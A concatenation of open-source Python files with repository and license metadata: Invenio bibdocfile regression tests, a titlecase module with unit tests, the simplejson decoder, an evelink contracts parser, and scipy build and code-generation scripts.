# we should not test for particular path ! this is in the gestion of the underlying implementation,
# not the interface which should ne tested
# self.assert_(my_new_bibdocfile.get_path().startswith(CFG_BIBDOCFILE_FILEDIR))
# self.assert_(my_new_bibdocfile.get_path().endswith('/img_test.jpg;1'))
#get bibdocid
self.assertEqual(my_new_bibdocfile.get_bibdocid(), my_new_bibdoc.get_id())
#get name
self.assertEqual(my_new_bibdocfile.get_name() , 'img_test')
#get full name
self.assertEqual(my_new_bibdocfile.get_full_name() , 'img_test.jpg')
#get full path
#self.assert_(my_new_bibdocfile.get_full_path().startswith(CFG_BIBDOCFILE_FILEDIR))
#self.assert_(my_new_bibdocfile.get_full_path().endswith('/img_test.jpg;1'))
#get format
self.assertEqual(my_new_bibdocfile.get_format(), '.jpg')
#get version
self.assertEqual(my_new_bibdocfile.get_version(), 1)
#get description
self.assertEqual(my_new_bibdocfile.get_description(), my_new_bibdoc.get_description('.jpg', version=1))
#get comment
self.assertEqual(my_new_bibdocfile.get_comment(), my_new_bibdoc.get_comment('.jpg', version=1))
#get recid
self.assertEqual(my_new_bibdocfile.get_recid(), 2)
#get status
self.assertEqual(my_new_bibdocfile.get_status(), '')
#get size
self.assertEqual(my_new_bibdocfile.get_size(), 91750)
#get checksum
self.assertEqual(my_new_bibdocfile.get_checksum(), '28ec893f9da735ad65de544f71d4ad76')
#check
self.assertEqual(my_new_bibdocfile.check(), True)
#display
tmpl = invenio.template.load("bibdocfile")
value = tmpl.tmpl_display_bibdocfile(my_new_bibdocfile, ln='en')
assert 'files/img_test.jpg?version=1">' in value
#hidden?
self.assertEqual(my_new_bibdocfile.hidden_p(), False)
#check modification date
self.assertEqual(my_new_bibdocfile.md, timestamp)
#delete
my_new_bibdoc.delete()
self.assertEqual(my_new_bibdoc.deleted_p(), True)
class CheckBibDocAuthorizationTest(InvenioTestCase):
"""Regression tests for check_bibdoc_authorization function."""
def test_check_bibdoc_authorization(self):
"""bibdocfile - check_bibdoc_authorization function"""
from invenio.webuser import collect_user_info, get_uid_from_email
jekyll = collect_user_info(get_uid_from_email('jekyll@cds.cern.ch'))
self.assertEqual(check_bibdoc_authorization(jekyll, 'role:thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'role: thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'role: thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'Role: thesesviewer'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'email: jekyll@cds.cern.ch'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(jekyll, 'email: jekyll@cds.cern.ch'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
juliet = collect_user_info(get_uid_from_email('juliet.capulet@cds.cern.ch'))
self.assertEqual(check_bibdoc_authorization(juliet, 'restricted_picture'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertEqual(check_bibdoc_authorization(juliet, 'status: restricted_picture'), (0, CFG_WEBACCESS_WARNING_MSGS[0]))
self.assertNotEqual(check_bibdoc_authorization(juliet, 'restricted_video')[0], 0)
self.assertNotEqual(check_bibdoc_authorization(juliet, 'status: restricted_video')[0], 0)
class BibDocFileURLTest(InvenioTestCase):
"""Regression tests for bibdocfile_url_p function."""
def test_bibdocfile_url_p(self):
"""bibdocfile - check bibdocfile_url_p() functionality"""
self.failUnless(bibdocfile_url_p(CFG_SITE_URL + '/%s/98/files/9709037.pdf' % CFG_SITE_RECORD))
self.failUnless(bibdocfile_url_p(CFG_SITE_URL + '/%s/098/files/9709037.pdf' % CFG_SITE_RECORD))
class MoreInfoTest(InvenioTestCase):
"""regression tests about BibDocFiles"""
def test_initialData(self):
"""Testing if passing the initial data really enriches the existing structure"""
more_info = MoreInfo(docid = 134)
more_info.set_data("ns1", "k1", "vsrjklfh23478956@#%@#@#%")
more_info2 = MoreInfo(docid = 134, initial_data = {"ns1" : { "k2" : "weucb2324@#%@#$%@"}})
self.assertEqual(more_info.get_data("ns1", "k2"), "weucb2324@#%@#$%@")
self.assertEqual(more_info.get_data("ns1", "k1"), "vsrjklfh23478956@#%@#@#%")
self.assertEqual(more_info2.get_data("ns1", "k2"), "weucb2324@#%@#$%@")
self.assertEqual(more_info2.get_data("ns1", "k1"), "vsrjklfh23478956@#%@#@#%")
more_info3 = MoreInfo(docid = 134)
self.assertEqual(more_info3.get_data("ns1", "k2"), "weucb2324@#%@#$%@")
self.assertEqual(more_info3.get_data("ns1", "k1"), "vsrjklfh23478956@#%@#@#%")
more_info.del_key("ns1", "k1")
more_info.del_key("ns1", "k2")
def test_createSeparateRead(self):
"""MoreInfo - testing if information saved using one instance is accessible via
a new one"""
more_info = MoreInfo(docid = 13)
more_info.set_data("some_namespace", "some_key", "vsrjklfh23478956@#%@#@#%")
more_info2 = MoreInfo(docid = 13)
self.assertEqual(more_info.get_data("some_namespace", "some_key"), "vsrjklfh23478956@#%@#@#%")
self.assertEqual(more_info2.get_data("some_namespace", "some_key"), "vsrjklfh23478956@#%@#@#%")
more_info2.del_key("some_namespace", "some_key")
def test_DictionaryBehaviour(self):
"""moreinfo - tests assignments of data, both using the general interface and using
namespaces"""
more_info = MoreInfo()
more_info.set_data("namespace1", "key1", "val1")
more_info.set_data("namespace1", "key2", "val2")
more_info.set_data("namespace2", "key1", "val3")
self.assertEqual(more_info.get_data("namespace1", "key1"), "val1")
self.assertEqual(more_info.get_data("namespace1", "key2"), "val2")
self.assertEqual(more_info.get_data("namespace2", "key1"), "val3")
def test_inMemoryMoreInfo(self):
"""test that MoreInfo is really stored only in memory (no database accesses)"""
m1 = MoreInfo(docid = 101, version = 12, cache_only = True)
m2 = MoreInfo(docid = 101, version = 12, cache_reads = False) # The most direct DB access
m1.set_data("n1", "k1", "v1")
self.assertEqual(m2.get_data("n1","k1"), None)
self.assertEqual(m1.get_data("n1","k1"), "v1")
def test_readCacheMoreInfo(self):
"""we verify that if value is not present in the cache, read will happen from the database"""
m1 = MoreInfo(docid = 102, version = 12)
m2 = MoreInfo(docid = 102, version = 12) # The most direct DB access
self.assertEqual(m2.get_data("n11","k11"), None)
self.assertEqual(m1.get_data("n11","k11"), None)
m1.set_data("n11", "k11", "some value")
self.assertEqual(m1.get_data("n11","k11"), "some value")
self.assertEqual(m2.get_data("n11","k11"), "some value") # read from a different instance
m1.delete()
m2.delete()
class BibDocFileMd5FolderTests(InvenioTestCase):
"""Regression test class for the Md5Folder class"""
def setUp(self):
self.path = os.path.join(CFG_TMPDIR, 'md5_tests')
if not os.path.exists(self.path):
os.makedirs(self.path)
def tearDown(self):
shutil.rmtree(self.path)
def test_empty_md5folder(self):
"""bibdocfile - empty Md5Folder"""
self.assertEqual(Md5Folder(self.path).md5s, {})
def test_one_file_md5folder(self):
"""bibdocfile - one file in Md5Folder"""
open(os.path.join(self.path, 'test.txt'), "w").write("test")
md5s = Md5Folder(self.path)
self.assertEqual(md5s.md5s, {'test.txt': '098f6bcd4621d373cade4e832627b4f6'})
def test_adding_one_more_file_md5folder(self):
"""bibdocfile - one more file in Md5Folder"""
open(os.path.join(self.path, 'test.txt'), "w").write("test")
md5s = Md5Folder(self.path)
self.assertEqual(md5s.md5s, {'test.txt': '098f6bcd4621d373cade4e832627b4f6'})
open(os.path.join(self.path, 'test2.txt'), "w").write("second test")
md5s.update()
self.assertEqual(md5s.md5s, {'test.txt': '098f6bcd4621d373cade4e832627b4f6', 'test2.txt': 'f5a6496b3ed4f2d6e5d602c7be8e6b42'})
def test_detect_corruption(self):
"""bibdocfile - detect corruption in Md5Folder"""
open(os.path.join(self.path, 'test.txt'), "w").write("test")
md5s = Md5Folder(self.path)
open(os.path.join(self.path, 'test.txt'), "w").write("second test")
self.failIf(md5s.check('test.txt'))
md5s.update(only_new=False)
self.failUnless(md5s.check('test.txt'))
self.assertEqual(md5s.get_checksum('test.txt'), 'f5a6496b3ed4f2d6e5d602c7be8e6b42')
if CFG_PATH_MD5SUM:
def test_md5_algorithms(self):
"""bibdocfile - compare md5 algorithms"""
filepath = os.path.join(self.path, 'test.txt')
open(filepath, "w").write("test")
self.assertEqual(calculate_md5(filepath, force_internal=True), calculate_md5_external(filepath))
TEST_SUITE = make_test_suite(BibDocFileMd5FolderTests,
BibRecDocsTest,
BibDocsTest,
BibDocFilesTest,
MoreInfoTest,
BibRelationTest,
BibDocFileURLTest,
CheckBibDocAuthorizationTest,
BibDocFsInfoTest,
BibDocFileGuessFormat)
if __name__ == "__main__":
run_test_suite(TEST_SUITE, warn_user=True)
|
gpl-2.0
|
LettError/filibuster
|
Lib/filibuster/titlecase.py
|
1
|
9269
|
# -*- coding: UTF-8 -*-
"""
titlecase.py v0.2
Original Perl version by: John Gruber http://daringfireball.net/ 10 May 2008
Python version by Stuart Colville http://muffinresearch.co.uk
License: http://www.opensource.org/licenses/mit-license.php
"""
import unittest
import sys
import re
SMALL = 'a|an|and|as|at|but|by|en|for|if|in|of|on|or|the|to|v\.?|via|vs\.?'
PUNCT = "[!\"#$%&'‘()*+,-./:;?@[\\\\\\]_`{|}~]"
SMALL_WORDS = re.compile(r'^(%s)$' % SMALL, re.I)
INLINE_PERIOD = re.compile(r'[a-zA-Z][.][a-zA-Z]')
UC_ELSEWHERE = re.compile(r'%s*?[a-zA-Z]+[A-Z]+?' % PUNCT)
CAPFIRST = re.compile(r"^%s*?([A-Za-z])" % PUNCT)
SMALL_FIRST = re.compile(r'^(%s*)(%s)\b' % (PUNCT, SMALL), re.I)
SMALL_LAST = re.compile(r'\b(%s)%s?$' % (SMALL, PUNCT), re.I)
SUBPHRASE = re.compile(r'([:.;?!][ ])(%s)' % SMALL)
def titlecase(text):
"""
Titlecases input text
This filter changes all words to Title Caps, and attempts to be clever
about *un*capitalizing SMALL words like a/an/the in the input.
The list of "SMALL words" which are not capped comes from
the New York Times Manual of Style, plus 'vs' and 'v'.
"""
words = re.split('\s', text)
line = []
for word in words:
if INLINE_PERIOD.search(word) or UC_ELSEWHERE.match(word):
line.append(word)
continue
if SMALL_WORDS.match(word):
line.append(word.lower())
continue
line.append(CAPFIRST.sub(lambda m: m.group(0).upper(), word))
line = " ".join(line)
line = SMALL_FIRST.sub(lambda m: '%s%s' % (
m.group(1),
m.group(2).capitalize()
), line)
line = SMALL_LAST.sub(lambda m: m.group(0).capitalize(), line)
line = SUBPHRASE.sub(lambda m: '%s%s' % (
m.group(1),
m.group(2).capitalize()
), line)
return line
class TitlecaseTests(unittest.TestCase):
"""Tests to ensure titlecase follows all of the rules"""
def test_q_and_a(self):
u"""Testing: Q&A With Steve Jobs: 'That’s What Happens In Technology' """
text = titlecase(
u"Q&A with steve jobs: 'that’s what happens in technology'"
)
result = u"Q&A With Steve Jobs: 'That’s What Happens in Technology'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_at_and_t(self):
u"""Testing: What Is AT&T's Problem?"""
text = titlecase(u"What is AT&T’s problem?")
result = u"What Is AT&T’s Problem?"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_apple_deal(self):
"""Testing: Apple Deal With AT&T Falls Through"""
text = titlecase("Apple deal with AT&T falls through")
result = "Apple Deal With AT&T Falls Through"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_v_that(self):
"""Testing: this v that"""
text = titlecase("this v that")
result = "This v That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_v_that2(self):
"""Testing: this v. that"""
text = titlecase("this v. that")
result = "This v. That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_vs_that(self):
"""Testing: this vs that"""
text = titlecase("this vs that")
result = "This vs That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_this_vs_that2(self):
"""Testing: this vs. that"""
text = titlecase("this vs. that")
result = "This vs. That"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_apple_sec(self):
u"""Testing: The SEC’s Apple Probe: What You Need to Know"""
text = titlecase("The SEC’s Apple Probe: What You Need to Know")
result = u"The SEC’s Apple Probe: What You Need to Know"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_quoted(self):
"""Testing: 'by the Way, Small word at the start but within quotes.'"""
text = titlecase(
"'by the Way, small word at the start but within quotes.'"
)
result = "'By the Way, Small Word at the Start but Within Quotes.'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_end(self):
"""Testing: Small word at end is nothing to be afraid of"""
text = titlecase("Small word at end is nothing to be afraid of")
result = "Small Word at End Is Nothing to Be Afraid Of"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_sub_phrase_small_word(self):
"""Testing: Starting Sub-Phrase With a Small Word: a Trick, Perhaps?"""
text = titlecase(
"Starting Sub-Phrase With a Small Word: a Trick, Perhaps?"
)
result = "Starting Sub-Phrase With a Small Word: A Trick, Perhaps?"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_quotes(self):
"""Testing: Sub-Phrase With a Small Word in Quotes: 'a Trick..."""
text = titlecase(
"Sub-Phrase With a Small Word in Quotes: 'a Trick, Perhaps?'"
)
result = "Sub-Phrase With a Small Word in Quotes: 'A Trick, Perhaps?'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_small_word_double_quotes(self):
"""Testing: Sub-Phrase With a Small Word in Quotes: \"a Trick..."""
text = titlecase(
'Sub-Phrase With a Small Word in Quotes: "a Trick, Perhaps?"'
)
result = 'Sub-Phrase With a Small Word in Quotes: "A Trick, Perhaps?"'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_nothing_to_be_afraid_of(self):
"""Testing: \"Nothing to Be Afraid of?\""""
text = titlecase('"Nothing to Be Afraid of?"')
result = '"Nothing to Be Afraid Of?"'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_nothing_to_be_afraid_of2(self):
"""Testing: \"Nothing to Be Afraid Of?\""""
text = titlecase('"Nothing to be Afraid Of?"')
result = '"Nothing to Be Afraid Of?"'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_a_thing(self):
"""Testing: a thing"""
text = titlecase('a thing')
result = 'A Thing'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_vapourware(self):
"""Testing: 2lmc Spool: 'Gruber on OmniFocus and Vapo(u)rware'"""
text = titlecase(
"2lmc Spool: 'gruber on OmniFocus and vapo(u)rware'"
)
result = "2lmc Spool: 'Gruber on OmniFocus and Vapo(u)rware'"
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_domains(self):
"""Testing: this is just an example.com"""
text = titlecase('this is just an example.com')
result = 'This Is Just an example.com'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_domains2(self):
"""Testing: this is something listed on an del.icio.us"""
text = titlecase('this is something listed on del.icio.us')
result = 'This Is Something Listed on del.icio.us'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_itunes(self):
"""Testing: iTunes should be unmolested"""
text = titlecase('iTunes should be unmolested')
result = 'iTunes Should Be Unmolested'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_thoughts_on_music(self):
u"""Testing: Reading Between the Lines of Steve Jobs’s..."""
text = titlecase(
u'Reading between the lines of steve jobs’s ‘thoughts on music’'
)
result = u'Reading Between the Lines of Steve Jobs’s ‘Thoughts on Music’'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_repair_perms(self):
u"""Testing: Seriously, ‘Repair Permissions’ Is Voodoo"""
text = titlecase(u'seriously, ‘repair permissions’ is voodoo')
result = u'Seriously, ‘Repair Permissions’ Is Voodoo'
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
def test_generalissimo(self):
"""Testing: Generalissimo Francisco Franco..."""
text = titlecase(
'generalissimo francisco franco: still dead; kieren McCarthy: '\
'still a jackass'
)
result = u"""Generalissimo Francisco Franco: Still Dead; Kieren McCarthy: Still a Jackass."""
self.assertEqual(text, result, "%s should be: %s" % (text, result, ))
if __name__ == '__main__':
if not sys.stdin.isatty():
for line in sys.stdin:
print(titlecase(line))
else:
suite = unittest.TestLoader().loadTestsFromTestCase(TitlecaseTests)
unittest.TextTestRunner(verbosity=2).run(suite)
|
mit
|
Pathoschild/stewbot
|
stewbot/components/modules/simplejson/decoder.py
|
296
|
15152
|
"""Implementation of JSONDecoder
"""
import re
import sys
import struct
from simplejson.scanner import make_scanner
def _import_c_scanstring():
try:
from simplejson._speedups import scanstring
return scanstring
except ImportError:
return None
c_scanstring = _import_c_scanstring()
__all__ = ['JSONDecoder']
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
def _floatconstants():
_BYTES = '7FF80000000000007FF0000000000000'.decode('hex')
# The struct module in Python 2.4 would get frexp() out of range here
# when an endian is specified in the format string. Fixed in Python 2.5+
if sys.byteorder != 'big':
_BYTES = _BYTES[:8][::-1] + _BYTES[8:][::-1]
nan, inf = struct.unpack('dd', _BYTES)
return nan, inf, -inf
NaN, PosInf, NegInf = _floatconstants()
class JSONDecodeError(ValueError):
"""Subclass of ValueError with the following additional properties:
msg: The unformatted error message
doc: The JSON document being parsed
pos: The start index of doc where parsing failed
end: The end index of doc where parsing failed (may be None)
lineno: The line corresponding to pos
colno: The column corresponding to pos
endlineno: The line corresponding to end (may be None)
endcolno: The column corresponding to end (may be None)
"""
def __init__(self, msg, doc, pos, end=None):
ValueError.__init__(self, errmsg(msg, doc, pos, end=end))
self.msg = msg
self.doc = doc
self.pos = pos
self.end = end
self.lineno, self.colno = linecol(doc, pos)
if end is not None:
self.endlineno, self.endcolno = linecol(doc, pos)
else:
self.endlineno, self.endcolno = None, None
def linecol(doc, pos):
lineno = doc.count('\n', 0, pos) + 1
if lineno == 1:
colno = pos
else:
colno = pos - doc.rindex('\n', 0, pos)
return lineno, colno
def errmsg(msg, doc, pos, end=None):
# Note that this function is called from _speedups
lineno, colno = linecol(doc, pos)
if end is None:
#fmt = '{0}: line {1} column {2} (char {3})'
#return fmt.format(msg, lineno, colno, pos)
fmt = '%s: line %d column %d (char %d)'
return fmt % (msg, lineno, colno, pos)
endlineno, endcolno = linecol(doc, end)
#fmt = '{0}: line {1} column {2} - line {3} column {4} (char {5} - {6})'
#return fmt.format(msg, lineno, colno, endlineno, endcolno, pos, end)
fmt = '%s: line %d column %d - line %d column %d (char %d - %d)'
return fmt % (msg, lineno, colno, endlineno, endcolno, pos, end)
_CONSTANTS = {
'-Infinity': NegInf,
'Infinity': PosInf,
'NaN': NaN,
}
STRINGCHUNK = re.compile(r'(.*?)(["\\\x00-\x1f])', FLAGS)
BACKSLASH = {
'"': u'"', '\\': u'\\', '/': u'/',
'b': u'\b', 'f': u'\f', 'n': u'\n', 'r': u'\r', 't': u'\t',
}
DEFAULT_ENCODING = "utf-8"
def py_scanstring(s, end, encoding=None, strict=True,
_b=BACKSLASH, _m=STRINGCHUNK.match):
"""Scan the string s for a JSON string. End is the index of the
character in s after the quote that started the JSON string.
Unescapes all valid JSON string escape sequences and raises ValueError
on attempt to decode an invalid string. If strict is False then literal
control characters are allowed in the string.
Returns a tuple of the decoded string and the index of the character in s
after the end quote."""
if encoding is None:
encoding = DEFAULT_ENCODING
chunks = []
_append = chunks.append
begin = end - 1
while 1:
chunk = _m(s, end)
if chunk is None:
raise JSONDecodeError(
"Unterminated string starting at", s, begin)
end = chunk.end()
content, terminator = chunk.groups()
# Content is contains zero or more unescaped string characters
if content:
if not isinstance(content, unicode):
content = unicode(content, encoding)
_append(content)
# Terminator is the end of string, a literal control character,
# or a backslash denoting that an escape sequence follows
if terminator == '"':
break
elif terminator != '\\':
if strict:
msg = "Invalid control character %r at" % (terminator,)
#msg = "Invalid control character {0!r} at".format(terminator)
raise JSONDecodeError(msg, s, end)
else:
_append(terminator)
continue
try:
esc = s[end]
except IndexError:
raise JSONDecodeError(
"Unterminated string starting at", s, begin)
# If not a unicode escape sequence, must be in the lookup table
if esc != 'u':
try:
char = _b[esc]
except KeyError:
msg = "Invalid \\escape: " + repr(esc)
raise JSONDecodeError(msg, s, end)
end += 1
else:
# Unicode escape sequence
esc = s[end + 1:end + 5]
next_end = end + 5
if len(esc) != 4:
msg = "Invalid \\uXXXX escape"
raise JSONDecodeError(msg, s, end)
uni = int(esc, 16)
# Check for surrogate pair on UCS-4 systems
if 0xd800 <= uni <= 0xdbff and sys.maxunicode > 65535:
msg = "Invalid \\uXXXX\\uXXXX surrogate pair"
if not s[end + 5:end + 7] == '\\u':
raise JSONDecodeError(msg, s, end)
esc2 = s[end + 7:end + 11]
if len(esc2) != 4:
raise JSONDecodeError(msg, s, end)
uni2 = int(esc2, 16)
uni = 0x10000 + (((uni - 0xd800) << 10) | (uni2 - 0xdc00))
next_end += 6
char = unichr(uni)
end = next_end
# Append the unescaped character
_append(char)
return u''.join(chunks), end
# Use speedup if available
scanstring = c_scanstring or py_scanstring
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
def JSONObject((s, end), encoding, strict, scan_once, object_hook,
object_pairs_hook, memo=None,
_w=WHITESPACE.match, _ws=WHITESPACE_STR):
# Backwards compatibility
if memo is None:
memo = {}
memo_get = memo.setdefault
pairs = []
# Use a slice to prevent IndexError from being raised, the following
# check will raise a more specific ValueError if the string is empty
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = {}
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end + 1
elif nextchar != '"':
raise JSONDecodeError("Expecting property name", s, end)
end += 1
while True:
key, end = scanstring(s, end, encoding, strict)
key = memo_get(key, key)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise JSONDecodeError("Expecting : delimiter", s, end)
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
value, end = scan_once(s, end)
except StopIteration:
raise JSONDecodeError("Expecting object", s, end)
pairs.append((key, value))
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise JSONDecodeError("Expecting , delimiter", s, end - 1)
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise JSONDecodeError("Expecting property name", s, end - 1)
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = dict(pairs)
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end
def JSONArray((s, end), scan_once, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
values = []
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return values, end + 1
_append = values.append
while True:
try:
value, end = scan_once(s, end)
except StopIteration:
raise JSONDecodeError("Expecting object", s, end)
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise JSONDecodeError("Expecting , delimiter", s, end)
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return values, end
class JSONDecoder(object):
"""Simple JSON <http://json.org> decoder
Performs the following translations in decoding by default:
+---------------+-------------------+
| JSON | Python |
+===============+===================+
| object | dict |
+---------------+-------------------+
| array | list |
+---------------+-------------------+
| string | unicode |
+---------------+-------------------+
| number (int) | int, long |
+---------------+-------------------+
| number (real) | float |
+---------------+-------------------+
| true | True |
+---------------+-------------------+
| false | False |
+---------------+-------------------+
| null | None |
+---------------+-------------------+
It also understands ``NaN``, ``Infinity``, and ``-Infinity`` as
their corresponding ``float`` values, which is outside the JSON spec.
"""
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True,
object_pairs_hook=None):
"""
*encoding* determines the encoding used to interpret any
:class:`str` objects decoded by this instance (``'utf-8'`` by
default). It has no effect when decoding :class:`unicode` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as :class:`unicode`.
*object_hook*, if specified, will be called with the result of every
JSON object decoded and its return value will be used in place of the
given :class:`dict`. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
*object_pairs_hook* is an optional function that will be called with
the result of any object literal decode with an ordered list of pairs.
The return value of *object_pairs_hook* will be used instead of the
:class:`dict`. This feature can be used to implement custom decoders
that rely on the order that the key and value pairs are decoded (for
example, :func:`collections.OrderedDict` will remember the order of
insertion). If *object_hook* is also defined, the *object_pairs_hook*
takes priority.
*parse_float*, if specified, will be called with the string of every
JSON float to be decoded. By default, this is equivalent to
``float(num_str)``. This can be used to use another datatype or parser
for JSON floats (e.g. :class:`decimal.Decimal`).
*parse_int*, if specified, will be called with the string of every
JSON int to be decoded. By default, this is equivalent to
``int(num_str)``. This can be used to use another datatype or parser
for JSON integers (e.g. :class:`float`).
*parse_constant*, if specified, will be called with one of the
following strings: ``'-Infinity'``, ``'Infinity'``, ``'NaN'``. This
can be used to raise an exception if invalid JSON numbers are
encountered.
*strict* controls the parser's behavior when it encounters an
invalid control character in a string. The default setting of
``True`` means that unescaped control characters are parse errors, if
``False`` then control characters will be allowed in strings.
"""
self.encoding = encoding
self.object_hook = object_hook
self.object_pairs_hook = object_pairs_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or _CONSTANTS.__getitem__
self.strict = strict
self.parse_object = JSONObject
self.parse_array = JSONArray
self.parse_string = scanstring
self.memo = {}
self.scan_once = make_scanner(self)
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise JSONDecodeError("Extra data", s, end, len(s))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode``
beginning with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
obj, end = self.scan_once(s, idx)
except StopIteration:
raise JSONDecodeError("No JSON object could be decoded", s, idx)
return obj, end
|
isc
|
zigdon/evelink
|
evelink/parsing/contracts.py
|
9
|
1347
|
from evelink import api
from evelink import constants
import time
def parse_contracts(api_result):
rowset = api_result.find('rowset')
if rowset is None:
return
results = {}
for row in rowset.findall('row'):
a = row.attrib
contract = {
'id': int(a['contractID']),
'issuer': int(a['issuerID']),
'issuer_corp': int(a['issuerCorpID']),
'assignee': int(a['assigneeID']),
'acceptor': int(a['acceptorID']),
'start': int(a['startStationID']),
'end': int(a['endStationID']),
'type': a['type'],
'status': a['status'],
'corp': a['forCorp'] == '1',
'availability': a['availability'],
'issued': api.parse_ts(a['dateIssued']),
'days': int(a['numDays']),
'price': float(a['price']),
'reward': float(a['reward']),
'collateral': float(a['collateral']),
'buyout': float(a['buyout']),
'volume': float(a['volume']),
'title': a['title']
}
contract['expired'] = api.parse_ts(a['dateExpired'])
contract['accepted'] = api.parse_ts(a['dateAccepted'])
contract['completed'] = api.parse_ts(a['dateCompleted'])
results[contract['id']] = contract
return results
|
mit
|
apbard/scipy
|
scipy/sparse/linalg/isolve/setup.py
|
108
|
1408
|
#!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join
def configuration(parent_package='',top_path=None):
from numpy.distutils.system_info import get_info, NotFoundError
from numpy.distutils.misc_util import Configuration
from scipy._build_utils import get_g77_abi_wrappers
config = Configuration('isolve',parent_package,top_path)
lapack_opt = get_info('lapack_opt')
if not lapack_opt:
raise NotFoundError('no lapack/blas resources found')
# iterative methods
methods = ['BiCGREVCOM.f.src',
'BiCGSTABREVCOM.f.src',
'CGREVCOM.f.src',
'CGSREVCOM.f.src',
# 'ChebyREVCOM.f.src',
'GMRESREVCOM.f.src',
# 'JacobiREVCOM.f.src',
'QMRREVCOM.f.src',
# 'SORREVCOM.f.src'
]
Util = ['STOPTEST2.f.src','getbreak.f.src']
sources = Util + methods + ['_iterative.pyf.src']
sources = [join('iterative', x) for x in sources]
sources += get_g77_abi_wrappers(lapack_opt)
config.add_extension('_iterative',
sources=sources,
extra_info=lapack_opt)
config.add_data_dir('tests')
return config
if __name__ == '__main__':
from numpy.distutils.core import setup
setup(**configuration(top_path='').todict())
|
bsd-3-clause
|
ortylp/scipy
|
scipy/sparse/generate_sparsetools.py
|
67
|
12572
|
#!/usr/bin/env python
"""
Generate manual wrappers for C++ sparsetools code.
Type codes used:
'i': integer scalar
'I': integer array
'T': data array
'B': boolean array
'V': std::vector<integer>*
'W': std::vector<data>*
'*': indicates that the next argument is an output argument
'v': void
See sparsetools.cxx for more details.
"""
import optparse
import os
from distutils.dep_util import newer
#
# List of all routines and their argument types.
#
# The first code indicates the return value, the rest the arguments.
#
# bsr.h
BSR_ROUTINES = """
bsr_diagonal v iiiiIIT*T
bsr_scale_rows v iiiiII*TT
bsr_scale_columns v iiiiII*TT
bsr_sort_indices v iiii*I*I*T
